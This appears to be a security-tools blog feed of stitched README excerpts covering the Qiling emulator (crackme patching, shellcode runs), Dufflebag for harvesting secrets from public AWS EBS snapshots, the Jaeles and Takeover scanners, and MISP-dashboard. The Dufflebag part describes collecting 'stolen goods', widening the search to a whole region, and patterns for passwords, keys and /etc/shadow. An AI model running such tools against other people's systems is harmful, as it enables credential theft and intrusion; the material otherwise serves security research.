  • Unicorn is just a CPU emulator: it focuses on emulating CPU instructions and understands emulator memory. Beyond that, Unicorn is not aware of higher level concepts, such as dynamic libraries, system calls, I/O handling or executable formats like PE, MachO or ELF. As a result, Unicorn can only emulate raw machine instructions, without Operating System (OS) context.
  • Qiling is designed as a higher level framework that leverages Unicorn to emulate CPU instructions, but understands the OS: it has executable format loaders (for PE, MachO & ELF at the moment), dynamic linkers (so we can load & relocate shared libraries), and syscall & IO handlers. For this reason, Qiling can run an executable binary without requiring its native OS.

Qiling vs Qemu usermode
Qemu usermode does a similar thing to our emulator, that is, emulating whole executable binaries in a cross-architecture way. However, Qiling offers some important differences from Qemu usermode.
  • Qiling is a true analysis framework that allows you to build your own dynamic analysis tools on top (in the friendly Python language). Meanwhile, Qemu is just a tool, not a framework.
  • Qiling can perform dynamic instrumentation, and can even hotpatch code at runtime. Qemu does not do either.
  • Besides working cross-architecture, Qiling is also cross-platform, so for example you can run a Linux ELF file on top of Windows. In contrast, Qemu usermode only runs binaries of the same OS, such as Linux ELF on Linux, due to the way it forwards syscalls from emulated code to the native OS.
  • Qiling supports more platforms, including Windows, MacOS, Linux & BSD. Qemu usermode can only handle Linux & BSD.

Install
Run the command below to install Qiling (Python3 is required).
python3 setup.py install

Examples
  • Below example shows how to use Qiling framework to emulate a Windows EXE on a Linux machine.
from qiling import *

# sandbox to emulate the EXE
def my_sandbox(path, rootfs):
    # setup Qiling engine
    ql = Qiling(path, rootfs)
    # now emulate the EXE
    ql.run()

if __name__ == "__main__":
    # execute Windows EXE under our rootfs
    my_sandbox(["examples/rootfs/x86_windows/bin/x86-windows-hello.exe"], "examples/rootfs/x86_windows")
  • Below example shows how to use Qiling framework to dynamically patch a Windows crackme, make it always display "Congratulation" dialog.
from qiling import *

def force_call_dialog_func(ql):
    # get DialogFunc address
    lpDialogFunc = ql.unpack32(ql.mem_read(ql.sp - 0x8, 4))
    # setup stack memory for DialogFunc
    ql.stack_push(0)
    ql.stack_push(1001)
    ql.stack_push(273)
    ql.stack_push(0)
    ql.stack_push(0x0401018)
    # force EIP to DialogFunc
    ql.pc = lpDialogFunc


def my_sandbox(path, rootfs):
    ql = Qiling(path, rootfs)
    # NOP out some code
    ql.patch(0x004010B5, b'\x90\x90')
    ql.patch(0x004010CD, b'\x90\x90')
    ql.patch(0x0040110B, b'\x90\x90')
    ql.patch(0x00401112, b'\x90\x90')
    # hook at an address with a callback
    ql.hook_address(0x00401016, force_call_dialog_func)
    ql.run()


if __name__ == "__main__":
    my_sandbox(["rootfs/x86_windows/bin/Easy_CrackMe.exe"], "rootfs/x86_windows")
The below Youtube video shows how the above example works.


Wannacry demo
  • The below Youtube video shows how Qiling analyzes Wannacry malware.


Qltool
Qiling also provides a friendly tool named qltool to quickly emulate shellcode & executable binaries.
To emulate a binary, run:
$ ./qltool run -f examples/rootfs/arm_linux/bin/arm32-hello --rootfs examples/rootfs/arm_linux/
To run shellcode, run:
$ ./qltool shellcode --os linux --arch x86 --asm -f examples/shellcodes/lin32_execve.asm

Core developers


Dufflebag - Search Exposed EBS Volumes For Secrets

Dufflebag is a tool that searches through public Elastic Block Storage (EBS) snapshots for secrets that may have been accidentally left in. You may be surprised by all the passwords and secrets just laying around!
The tool is organized as an Elastic Beanstalk ("EB", not to be confused with EBS) application, and definitely won't work if you try to run it on your own machine.
Dufflebag has a lot of moving pieces because it's fairly nontrivial to actually read EBS volumes in practice. You have to be in an AWS environment, clone the snapshot, make a volume from the snapshot, attach the volume, mount the volume, etc... This is why it's made as an Elastic Beanstalk app, so it can automagically scale up or down however much you like, and so that the whole thing can be easily torn down when you're done with it.
Just keep an eye on your AWS console to make sure nothing is going haywire and racking up bills. We've tried to think of every contingency and provide error handling... but you've been warned!

Getting Started

Permissions
You'll need to add some additional AWS IAM permissions to the role: aws-elasticbeanstalk-ec2-role. Alternatively, you can make a whole new role with these permissions and set EB to use that role, but it's a little more involved. In any case, you'll need to add:
  • AttachVolume (ec2)
  • CopySnapshot (ec2)
  • CreateVolume (ec2)
  • DeleteSnapshot (ec2)
  • DeleteVolume (ec2)
  • DescribeSnapshots (ec2)
  • DescribeVolumes (ec2)
  • DetachVolume (ec2)
  • PurgeQueue (sqs)
  • ListQueues (sqs)
  • ListAllMyBuckets (s3)
  • PutObject (s3)

Building
The core application is written in Go, so you'll need a Golang compiler. But the EB application is actually built into a .zip file (that's just how EB works) so the makefile will output a zip for you.
  1. Check your region. Dufflebag can only operate in one AWS region at a time. If you want to search every region, you'll have to deploy that many instances. To change the region, change the contents of the source code file region.go.
  2. Install dependencies: Ubuntu 18.04 x64:
sudo apt install make golang-go git
go get -u github.com/aws/aws-sdk-go
go get -u github.com/deckarep/golang-set
go get -u github.com/lib/pq
  1. Then build the EB app into a zip file with:
make
You should now see a dufflebag.zip file in the root project directory.
  1. Lastly, you'll need to make an S3 bucket. Setting this up automatically within Dufflebag might be possible, but it'd actually be pretty hard. So just do it yourself. You just need to make an S3 bucket with default permissions, and have the name start with dufflebag. S3 bucket names have to be globally unique, so you'll probably need to have some suffix that is a bunch of gibberish or something.
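If you'd rather script this step, a minimal boto3 sketch follows (the random-suffix scheme and region are assumptions; any globally unique bucket name starting with dufflebag works):
import uuid
import boto3

s3 = boto3.client("s3", region_name="us-east-1")
bucket_name = "dufflebag-" + uuid.uuid4().hex[:12]  # random suffix for global uniqueness
s3.create_bucket(Bucket=bucket_name)  # regions other than us-east-1 also need a LocationConstraint
print("Created bucket:", bucket_name)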

Deploying to Elastic Beanstalk
Go to your AWS console and find the Elastic Beanstalk menu option. This is probably doable via the CLI too, but this description will use the console. Select Actions -> Create Environment.



Then in the next window choose Worker environment and hit Select.


In the next window, choose Preconfigured -> Go for the Platform.


Under Application Code, choose Upload your Code.


Hit the Upload button and select the dufflebag.zip that you just built.


Finally, hit Create Environment to get started.
It will take a few minutes for AWS to make all the things and get started. Once created, Dufflebag will get started right away. No need to do anything else.

Remove the Safety Valve
Once you have this up and running, you can try again with the safety valve removed. By default, Dufflebag only searches 20 EBS snapshots. (So that it doesn't go haywire on your very first try) In order to widen the search to the entire region, go into populate.go, remove the following line of code, and rebuild:
//#####################################################################
//#### Safety Valve ####
//#### Remove this line of code below to search all of your region ####
//#####################################################################
snapshots = snapshots_result.Snapshots[0:20]

Scaling Up
One of the reasons Dufflebag is designed as an Elastic Beanstalk app is so that you can automatically scale the program up or down easily. By default, it'll just run on one instance and be pretty slow. But if you'd like to juice it up a little, adjust the autoscaling in Elastic Beanstalk. The full options of this are a little outside the scope of this document, so I'll let you play with them. But in practice, I've found that a simple CPU use trigger works pretty well.
When setting up the environment above, you'll find the options under the Configure more options button (instead of hitting Create environment) and then hit Scaling.


Getting The Stolen Goods
Dufflebag will copy any interesting files out to the S3 bucket that you made earlier. (Technically, Dufflebag will use the first S3 bucket it finds whose name starts with "dufflebag".)
You can just watch the files come in one-by-one in your S3 bucket. They will be named:
originalfilename_blake3sum_volumeid

Checking on Status
If everything is going well, you shouldn't need to read the logs. But just in case, Elastic Beanstalk lets apps write to log files as they run, and these are captured by navigating to the Logs tab. Then hit Request Logs and Last 100 Lines. This will get you the most recent batch of Dufflebag logs. Hit the Download button to read it. This file will contain a bunch of other system logs, but the Dufflebag part is under "/var/log/web-1.log" at the top.
In order to see the full log history, select Full Logs instead of Last 100 Lines. (Note that EB will rotate logs away pretty aggressively by default)
Additionally, you can get a sense of overall progress by looking at the SQS queue for the environment. Elastic Beanstalk worker environments use SQS to manage the workflow. Each message in the queue for Dufflebag represents an EBS volume to process:


The Messages Available column shows how many volumes have not yet been processed. The Messages in Flight column shows how many volumes are being processed right now.

Tweaking what to Search For
Dufflebag is programmed to search for stuff we thought would be likely to be "interesting". Private keys, passwords, AWS keys, etc... But what if you really want to search for something specific to YOU? Like, maybe you work for bank.com and would like to see what's out there that references bank.com.
Doing so will require a minor amount of modification to the Dufflebag code, but not very much. Don't worry! The logic for what to search for happens in inspector.go. The pilfer() function is a goroutine that handles inspecting a file. The code there may look a little intimidating at first, but here's what it's doing, and how you can modify it without much difficulty (a Python sketch of this flow follows the lists below).
File name blacklists:
  1. Check the file name against a blacklist. (blacklist_exact)
  2. Check the file name against a "contains" blacklist. (Reject the file if it contains a given string) (blacklist_contains)
  3. Check the file name against a prefix blacklist. (Reject the file if it starts with a given string) (blacklist_prefix)
You can modify the searching logic here pretty easily by just changing what's in those three lists, though in general I'd recommend leaving these intact. These blacklists are designed to cover boring files that are present in a lot of filesystems, and they prevent Dufflebag from needing to inspect every single file on all of AWS in depth. The sensitive data you're looking for MIGHT be in those files... but probably not.
File name whitelist:
  1. The IsSensitiveFileName() function checks the file name against a regular expression that finds sensitive file names. (Such as /etc/shadow, bash_history, etc...)
File contents:
  1. Check the file contents against a set of regular expressions.
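Putting that together, here is a rough Python sketch of the filtering flow (Dufflebag itself implements this in Go in inspector.go; every list and pattern below is an illustrative assumption, not the tool's actual contents):
import re

BLACKLIST_EXACT = {"/etc/hosts", "/etc/fstab"}          # assumed examples
BLACKLIST_CONTAINS = ["/usr/share/", "/node_modules/"]  # assumed examples
BLACKLIST_PREFIX = ["/proc/", "/sys/"]                  # assumed examples
SENSITIVE_NAME_RE = re.compile(r"(shadow|bash_history|id_rsa|\.pem$)")
CONTENT_PATTERNS = [
    re.compile(rb"-----BEGIN (RSA|EC|OPENSSH) PRIVATE KEY-----"),
    re.compile(rb"AKIA[0-9A-Z]{16}"),  # shape of an AWS access key id
]

def is_interesting(path, contents):
    if path in BLACKLIST_EXACT:
        return False
    if any(s in path for s in BLACKLIST_CONTAINS):
        return False
    if any(path.startswith(p) for p in BLACKLIST_PREFIX):
        return False
    if SENSITIVE_NAME_RE.search(path):
        return True  # sensitive file name: keep it regardless of contents
    return any(p.search(contents) for p in CONTENT_PATTERNS)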


Jaeles v0.4 - The Swiss Army Knife For Automated Web Application Testing

$
0
0

Jaeles is a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner.

Installation
Download precompiled version here.
If you have a Go environment, make sure you have Go >= 1.13 with Go Modules enabled and run the following command.
GO111MODULE=on go get -u github.com/jaeles-project/jaeles
Please visit the Official Documentation for more details.
Check out the Signature Repo for base signatures and passive signatures.

Usage
More usage here
Example commands.
jaeles scan -u http://example.com

jaeles scan -s signatures/common/phpdebug.yaml -U /tmp/list_of_urls.txt

jaeles scan -v --passive --verbose -s "signatures/cves/jira-*" -U /tmp/list_of_urls.txt -o /tmp/vuls

jaeles server --verbose -s sqli

Showcases
More showcase here


Detect Jira SSRF CVE-2019-8451

Burp Integration


Plugin can be found here and Video Guide here

Mentions
My introduction slide about Jaeles

Planned Features
  • Adding more signatures.
  • Adding more input sources.
  • Adding more APIs to get access to more properties of the request.
  • Adding proxy plugins to directly receive input from the browser or HTTP client.
  • Adding passive signature for passive checking each request.
  • Adding more action on Web UI.
  • Integrate with many other tools.

Credits


Misp-Dashboard - A Dashboard For A Real-Time Overview Of Threat Intelligence From MISP Instances


A dashboard showing live data and statistics from the ZMQ feeds of one or more MISP instances. The dashboard can be used as a real-time situational awareness tool to gather threat intelligence information. The misp-dashboard includes a gamification tool to show the contributions of each organisation and how they are ranked over time. The dashboard can be used for SOCs (Security Operation Centers), security teams or during cyber exercises to keep track of what is being processed on your various MISP instances.

Features

Live Dashboard
  • Possibility to subscribe to multiple ZMQ feeds from different MISP instances
  • Shows immediate contributions made by organisations
  • Displays live resolvable posted geo-locations


Geolocalisation Dashboard
  • Provides historical geolocalised information to support security teams, CSIRTs or SOCs in finding threats within their constituency
  • Possibility to get geospatial information from specific regions

Contributors Dashboard
Shows:
  • The monthly rank of all organisations
  • The last organisation that contributed (dynamic updates)
  • The contribution level of all organisations
  • Each category of contributions per organisation
  • The current ranking of the selected organisation (dynamic updates)
Includes:
  • Gamification of the platform:
    • Two different levels of ranking with unique icons
    • Exclusive obtainable badges for source code contributors and donators


Users Dashboard
  • Shows when and how the platform is used:
    • Login punchcard and contributions over time
    • Contribution vs login

Trendings Dashboard
  • Provides real-time information to support security teams, CSIRTs or SOCs, showing current threats and activity
    • Shows the most active events, categories and tags
    • Shows sightings and discussions over time

Installation
Before installing, consider that the only supported systems are open source Unix-like operating systems such as Linux and others.
  • Launch ./install_dependencies.sh from the MISP-Dashboard directory (idempotent-ish)
  • Update the configuration file config.cfg so that it matches your system
    • Fields that you may change (an example snippet follows this list):
      • RedisGlobal -> host
      • RedisGlobal -> port
      • RedisGlobal -> zmq_url
      • RedisGlobal -> misp_web_url
      • RedisMap -> pathMaxMindDB
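For reference, a minimal sketch of what those fields might look like in config.cfg (all values below are assumptions; adapt them to your setup):
[RedisGlobal]
host = localhost
port = 6250
zmq_url = tcp://localhost:50000
misp_web_url = https://misp.local

[RedisMap]
pathMaxMindDB = ./data/GeoLite2-City/GeoLite2-City.mmdb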

Updating by pulling
  • Re-launch ./install_dependencies.sh to fetch new required dependencies
  • Re-update your configuration file config.cfg by comparing eventual changes in config.cfg.default
Make sure no zmq python3 scripts are running. They block the update.
+ virtualenv -p python3 DASHENV
Already using interpreter /usr/bin/python3
Using base prefix '/usr'
New python executable in /home/steve/code/misp-dashboard/DASHENV/bin/python3
Traceback (most recent call last):
  File "/usr/bin/virtualenv", line 9, in <module>
    load_entry_point('virtualenv==15.0.1', 'console_scripts', 'virtualenv')()
  File "/usr/lib/python3/dist-packages/virtualenv.py", line 719, in main
    symlink=options.symlink)
  File "/usr/lib/python3/dist-packages/virtualenv.py", line 942, in create_environment
    site_packages=site_packages, clear=clear, symlink=symlink))
  File "/usr/lib/python3/dist-packages/virtualenv.py", line 1261, in install_python
    shutil.copyfile(executable, py_executable)
  File "/usr/lib/python3.5/shutil.py", line 115, in copyfile
    with open(dst, 'wb') as fdst:
OSError: [Errno 26] Text file busy: '/home/steve/code/misp-dashboard/DASHENV/bin/python3'
  • Restart the system: ./start_all.sh OR ./start_zmq.sh and ./server.py &

Starting the System
You should not run it as root. Normal privileges are fine.
  • Be sure to have a running redis server
    • e.g. redis-server --port 6250
  • Activate your virtualenv . ./DASHENV/bin/activate
  • Listen to the MISP feed by starting the zmq_subscriber ./zmq_subscriber.py &
  • Start the dispatcher to process received messages ./zmq_dispatcher.py &
  • Start the Flask server ./server.py &
  • Access the interface at http://localhost:8001/
Alternatively, you can run the start_all.sh script to run the commands described above.

Authentication
Authentication can be enabled in config/config.cfg by setting auth_enabled = True. Users will be required to log in to MISP and will be allowed to proceed if their MISP user account has the User Setting dashboard_access set to 1.

Debug
Debug is fun and gives you more details on what is going on when things fail. Bear in mind that running Flask in debug is NOT suitable for production; if enabled, it will drop you to a Python shell to do further digging.
Just before running ./server.py do:
export FLASK_DEBUG=1
export FLASK_APP=server.py
flask run --host=0.0.0.0 --port=8001 # <- Be careful here, this exposes it on ALL ip addresses. Ideally if run locally --host=127.0.0.1
OR, just toggle the debug flag in start_all.sh or config.cfg.
Happy hacking ;)

Restart from scratch
To restart from scratch and empty all data from your dashboard you can use the dedicated cleaning script clean.py
Clean data stored in the redis server specified in the configuration file

optional arguments:
  -h, --help    show this help message and exit
  -b, --brutal  Perform a FLUSHALL on the redis database. If not set, will use
                a soft method to delete only keys used by MISP-Dashboard.

Notes about ZMQ
Since the misp-dashboard is stateless with regard to MISP, it can only process data that it has received. Meaning that if your MISP is not publishing all notifications to its ZMQ, the misp-dashboard will not have them.
The most relevant example could be the user login punchcard. If your MISP doesn't have the option Plugin.ZeroMQ_audit_notifications_enable set to true, the punchcard will be empty.

Dashboard not showing results - No module named zmq
When the misp-dashboard does not show results, first check if the zmq module within MISP is properly installed.
In Administration, Plugin Settings, ZeroMQ, check that Plugin.ZeroMQ_enable is set to True.
Publish a test event from MISP to ZMQ via Event Actions, Publish event to ZMQ.
Verify the logfiles:
${PATH_TO_MISP}/app/tmp/log/mispzmq.error.log
${PATH_TO_MISP}/app/tmp/log/mispzmq.log
If there's an error ModuleNotFoundError: No module named 'zmq', then install pyzmq:
$SUDO_WWW ${PATH_TO_MISP}/venv/bin/pip install pyzmq

zmq_subscriber options
A zmq subscriber. It subscribes to a ZMQ feed and redispatches it to the MISP-dashboard.

optional arguments:
  -h, --help            show this help message and exit
  -n ZMQNAME, --name ZMQNAME
                        The ZMQ feed name
  -u ZMQURL, --url ZMQURL
                        The URL to connect to

Deploy in production using mod_wsgi
Install Apache mod-wsgi for Python3:
sudo apt-get install libapache2-mod-wsgi-py3
Caveat: If you already have mod-wsgi installed for Python2, it will be replaced!
Configuration file /etc/apache2/sites-available/misp-dashboard.conf assumes that misp-dashboard is cloned into /var/www/misp-dashboard. It runs as user misp in this example. Change the permissions to your custom folder and files accordingly.


Takeover v0.2 - Sub-Domain TakeOver Vulnerability Scanner


A sub-domain takeover vulnerability occurs when a sub-domain (subdomain.example.com) is pointing to a service (e.g. GitHub, AWS/S3, ...) that has been removed or deleted. This allows an attacker to set up a page on the service that was being used and point their page to that sub-domain. For example, if subdomain.example.com was pointing to a GitHub page and the user decided to delete their GitHub page, an attacker can now create a GitHub page, add a CNAME file containing subdomain.example.com, and claim subdomain.example.com. For more information: here
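The core detection idea can be sketched in a few lines with dnspython (illustrative only; takeover.py's actual logic and fingerprint list differ):
import dns.resolver  # pip3 install dnspython

SERVICE_FINGERPRINTS = {  # assumed, heavily abbreviated mapping
    "github.io": "Github",
    "s3.amazonaws.com": "AWS/S3",
    "herokuapp.com": "Heroku",
}

def cname_candidates(subdomain):
    # Resolve the CNAME and flag targets that point at takeover-prone services
    try:
        answers = dns.resolver.resolve(subdomain, "CNAME")
    except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
        return []
    targets = [str(r.target).rstrip(".") for r in answers]
    return [(t, svc) for t in targets
            for suffix, svc in SERVICE_FINGERPRINTS.items() if t.endswith(suffix)]

print(cname_candidates("subdomain.example.com"))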

Supported Services
'AWS/S3'
'BitBucket'
'CloudFront'
'Github'
'Shopify'
'Desk'
'Fastly'
'FeedPress'
'Ghost'
'Heroku'
'Pantheon'
'Tumbler'
'Wordpress'
'Desk'
'ZenDesk'
'TeamWork'
'Helpjuice'
'Helpscout'
'S3Bucket'
'Cargo'
'StatuPage'
'Uservoice'
'Surge'
'Intercom'
'Webflow'
'Kajabi'
'Thinkific'
'Tave'
'Wishpond'
'Aftership'
'Aha'
'Tictail'
'Brightcove'
'Bigcartel'
'ActiveCampaign'
'Campaignmonitor'
'Acquia'
'Proposify'
'Simplebooklet'
'GetResponse'
'Vend'
'Jetbrains'
'Unbounce'
'Tictail'
'Smartling'
'Pingdom'
'Tilda'
'Surveygizmo'
'Mashery'

Installation:
git clone https://github.com/m4ll0k/takeover.git
cd takeover
python3 takeover.py
or:
wget -q https://raw.githubusercontent.com/m4ll0k/takeover/master/takeover.py && python3 takeover.py
or:
pip3 install https://github.com/m4ll0k/takeover.git

Usage
$ python3 takeover.py -d www.domain.com -v 
$ python3 takeover.py -d www.domain.com -v -t 30
$ python3 takeover.py -d www.domain.com -p http://127.0.0.1:8080 -v
$ python3 takeover.py -d www.domain.com -o <output.txt> or <output.json> -v
$ python3 takeover.py -l uber-sub-domains.txt -o output.txt -p http://xxx.xxx.xxx.xxx:8080 -v
$ python3 takeover.py -d uber-sub-domains.txt -o output.txt -T 3 -v

